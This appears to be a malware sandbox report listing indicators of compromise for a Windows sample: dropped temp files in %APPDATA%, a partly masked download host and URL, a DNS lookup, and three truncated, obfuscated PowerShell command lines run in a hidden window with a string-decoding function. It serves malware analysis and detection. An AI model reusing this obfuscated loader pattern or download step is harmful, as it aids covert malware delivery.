Technical Information
- %APPDATA%\bitba97.tmp
- %APPDATA%\bit14f7.tmp
- from %APPDATA%\bitba97.tmp to %APPDATA%\dolmane.dis
- from %APPDATA%\bit14f7.tmp to %APPDATA%\dolmane.dis
- 'be#####rebrewers.com':80
- http://be#####rebrewers.com/FRZ1/Forskan.java
- DNS ASK be#####rebrewers.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Skatteafd9 ([String]$heiri){For($Filt=4; $Filt -lt $heiri.Length-1; $Filt+=(4+1)){$Desca=$heiri.Substring( $Filt, 1);$Democrat+=$Desca};$Democrat;}$Dorsalw=Skatteafd9 'Non...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Skatteafd9 ([String]$heiri){For($Filt=4; $Filt -lt $heiri.Length-1; $Filt+=(4+1)){$Desca=$heiri.Substring( $Filt, 1);$Democrat+=$Desca};$Democrat;}$Dorsalw=Skatteafd9 'Non...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Skatteafd9 ([String]$heiri){For($Filt=4; $Filt -lt $heiri.Length-1; $Filt+=(4+1)){$Desca=$heiri.Substring( $Filt, 1);$Democrat+=$Desca};$Democrat;}$Dorsalw=Skatteafd9 'Non...